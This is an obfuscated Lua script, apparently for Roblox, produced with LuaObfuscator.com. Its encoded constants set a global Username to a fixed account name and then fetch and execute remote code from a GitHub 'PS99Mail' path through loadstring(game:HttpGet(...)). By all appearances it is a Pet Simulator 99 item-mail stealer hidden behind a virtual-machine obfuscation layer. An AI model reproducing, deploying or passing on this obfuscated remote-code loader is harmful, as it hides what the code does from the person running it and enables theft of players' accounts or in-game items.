--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(1 + 0)) ;else local v84=(881 -262) -(555 + 64) ;local v85;while true do if (v84==(931 -(857 + (1139 -(68 + 997))))) then v85=(1639 -(1523 + 114))^(v32-(569 -(367 + (1471 -(226 + 1044))))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==((705 + 253) -((2189 -1297) + 65))) then return (v41 * (40022563 -23245347)) + (v40 * ((481461 -360323) -55602)) + (v39 * (469 -213)) + v38 ;end if (v37==(952 -(802 + 150))) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + (707 -444))) );v18=v18 + (184 -(67 + (204 -91))) ;v37=1 + 0 ;end end end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==1) then v45=1 + 0 ;v46=(v20(v44,1,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v43 ;v42=2 + 0 ;end if (v42==(3 -0)) then if (v47==(1187 -((2941 -1872) + 118))) then if (v46==(0 -0)) then return v48 * ((0 -0) -0) ;else v47=2 -(1 + 0) ;v45=0 + 0 ;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/((695 + 190) -(261 + 624))))) or (v48 * NaN) ;end return v8(v48,v47-((2869 -(87 + 968)) -(368 + 423)) ) * (v45 + (v46/((6 -4)^(70 -(10 + (35 -27)))))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=4 -3 ;end if (v42==(444 -(416 + 26))) then v47=v20(v44,66 -(41 + 4) ,106 -75 );v48=((v20(v44,14 + 18 )==(1 -0)) and  -(439 -(145 + 293))) or (431 -(44 + 386)) ;v42=1489 -(998 + 488) ;end end end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==((5 + 0) -3)) then v52={};for v91=1, #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=1 + 2 ;end if (v50==(1413 -(447 + 966))) then v51=nil;if  not v49 then v49=v23();if (v49==((1180 -(1123 + 57)) -0)) then return "";end end v50=15 -(9 + 5) ;end if (v50==(377 -(85 + 237 + 54))) then v51=v3(v16,v18,(v18 + v49) -(1818 -(1703 + 114)) );v18=v18 + v49 ;v50=1267 -(243 + 1022) ;end if (v50==(704 -(376 + 325))) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(2 -1)) then else v56=nil;v57=nil;v53=2 + 0 ;end if (v53==2) then local v88=241 -(187 + 54) ;while true do if (v88==(781 -(162 + 618))) then v53=3 + 0 ;break;end if (v88==0) then v58=nil;v59=nil;v88=1;end end end if (3~=v53) then else v60=nil;while true do local v93=0;while true do if (v93==1) then if (v54==3) then local v100=0 + 0 ;while true do if (v100==0) then for v106=1,v23() do v56[v106-1 ]=v28();end return v58;end end end if (v54==(1 -0)) then local v101=0 -0 ;while true do if (0==v101) then v58={v55,v56,nil,v57};v59=v23();v101=1;end if (v101==(1001 -(451 + 549))) then v60={};v54=1 + 1 ;break;end end end break;end if (v93~=(0 -0)) then else if ((0 -0)~=v54) then else local v102=0;local v103;while true do if (v102==0) then v103=1384 -(746 + 638) ;while true do if (v103==1) then v57={};v54=1 + 0 ;break;end if (v103~=(0 -0)) then else v55={};v56={};v103=342 -(218 + 123) ;end end break;end end end if (v54~=2) then else local v104=1581 -(1535 + 46) ;local v105;while true do if (v104==(0 + 0)) then v105=0;while true do if (v105==(1 + 0)) then for v148=1,v23() do local v149=560 -(306 + 254) ;local v150;local v151;while true do if ((0 + 0)==v149) then local v170=0;local v171;while true do if (v170==0) then v171=0 -0 ;while true do if (v171~=(1468 -(899 + 568))) then else v149=1 + 0 ;break;end if (v171~=0) then else v150=0;v151=nil;v171=1;end end break;end end end if (v149~=(2 -1)) then else while true do if ((603 -(268 + 335))==v150) then v151=v21();if (v20(v151,291 -(60 + 230) ,573 -(426 + 146) )==0) then local v178=0 + 0 ;local v179;local v180;local v181;while true do if (2==v178) then local v182=0;while true do if ((1457 -(282 + 1174))~=v182) then else v178=814 -(569 + 242) ;break;end if (v182~=0) then else if (v20(v180,2 -1 ,1)==1) then v181[1 + 1 ]=v60[v181[2]];end if (v20(v180,2,2)==(1025 -(706 + 318))) then v181[1254 -(721 + 530) ]=v60[v181[1274 -(945 + 326) ]];end v182=2 -1 ;end end end if (v178==1) then local v183=0 + 0 ;local v184;while true do if (v183==0) then v184=700 -(271 + 429) ;while true do if (v184~=0) then else v181={v22(),v22(),nil,nil};if (v179==(1288 -(993 + 295))) then local v192=0;local v193;while true do if (v192==0) then v193=0 + 0 ;while true do if (v193==(1171 -(418 + 753))) then v181[3]=v22();v181[4]=v22();break;end end break;end end elseif (v179==1) then v181[3]=v23();elseif (v179==2) then v181[3]=v23() -(2^(7 + 9)) ;elseif (v179~=3) then else local v198=0;local v199;local v200;while true do if ((1 + 0)==v198) then while true do if (v199~=(0 + 0)) then else v200=0 + 0 ;while true do if (v200==(529 -(406 + 123))) then v181[3]=v23() -((1771 -(1749 + 20))^(4 + 12)) ;v181[4]=v22();break;end end break;end end break;end if (v198~=0) then else v199=0;v200=nil;v198=1;end end end v184=1;end if (v184==(1323 -(1249 + 73))) then v178=1 + 1 ;break;end end break;end end end if (v178~=(1148 -(466 + 679))) then else if (v20(v180,3,6 -3 )~=(2 -1)) then else v181[4]=v60[v181[1904 -(106 + 1794) ]];end v55[v148]=v181;break;end if (v178~=0) then else v179=v20(v151,2,1 + 2 );v180=v20(v151,4,2 + 4 );v178=1;end end end break;end end break;end end end v54=3;break;end if (v105~=0) then else for v152=1,v59 do local v153=0 -0 ;local v154;local v155;while true do if (v153==1) then if (v154==(2 -1)) then v155=v21()~=(114 -(4 + 110)) ;elseif (v154==(586 -(57 + 527))) then v155=v24();elseif (v154==3) then v155=v25();end v60[v152]=v155;break;end if (v153~=(1427 -(41 + 1386))) then else local v173=103 -(17 + 86) ;while true do if (v173~=(1 + 0)) then else v153=1 -0 ;break;end if (v173==0) then v154=v21();v155=nil;v173=2 -1 ;end end end end end v58[169 -(122 + 44) ]=v21();v105=1 -0 ;end end break;end end end v93=3 -2 ;end end end break;end if (0~=v53) then else local v89=0;while true do if (v89~=(0 + 0)) then else v54=0 + 0 ;v55=nil;v89=1 -0 ;end if (1==v89) then v53=1;break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end if (v87==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v108=0;local v109;local v110;local v111;local v112;while true do if (0==v108) then v109=v79[2];v110,v111=v70(v77[v109](v13(v77,v109 + 1 ,v79[3])));v108=1;end if (2==v108) then for v157=v109,v72 do v112=v112 + 1 ;v77[v157]=v110[v112];end break;end if (v108==1) then v72=(v111 + v109) -1 ;v112=0;v108=2;end end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=2) then v77[v79[2]]();elseif (v80>3) then v77[v79[2]]=v79[3];else v77[v79[2]]();end elseif (v80<=7) then if (v80<=5) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==6) then do return;end else v71=v79[3];end elseif (v80<=8) then for v128=v79[2],v79[3] do v77[v128]=nil;end elseif (v80>9) then local v137=v79[2];v77[v137]=v77[v137](v13(v77,v137 + 1 ,v72));else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==0) then v140=v79[2];v141,v142=v70(v77[v140](v13(v77,v140 + 1 ,v79[3])));v139=1;end if (v139==2) then for v174=v140,v72 do local v175=0;while true do if (v175==0) then v143=v143 + 1 ;v77[v174]=v141[v143];break;end end end break;end if (v139==1) then v72=(v142 + v140) -1 ;v143=0;v139=2;end end end elseif (v80<=15) then if (v80<=12) then if (v80>11) then v71=v79[3];else local v116=v79[2];local v117=v77[v79[3]];v77[v116 + 1 ]=v117;v77[v116]=v117[v79[4]];end elseif (v80<=13) then v77[v79[2]]=v79[3];elseif (v80==14) then v63[v79[3]]=v77[v79[2]];elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=18) then if (v80<=16) then for v130=v79[2],v79[3] do v77[v130]=nil;end elseif (v80>17) then do return;end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=19) then local v123=v79[2];local v124=v77[v79[3]];v77[v123 + 1 ]=v124;v77[v123]=v124[v79[4]];elseif (v80==20) then local v146=0;local v147;while true do if (v146==0) then v147=v79[2];v77[v147]=v77[v147](v13(v77,v147 + 1 ,v72));break;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503073O0059726F746E6D65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012043O00014O0010000100013O0026053O00020001000100040C3O00020001001204000100013O002605000100050001000100040C3O00050001001204000200033O00120E000200023O00120F000200043O00120F000300053O002013000300030006001204000500074O0009000300054O000A00023O00022O000300020001000100040C3O0014000100040C3O0005000100040C3O0014000100040C3O000200012O00063O00017O00",v9(),...);
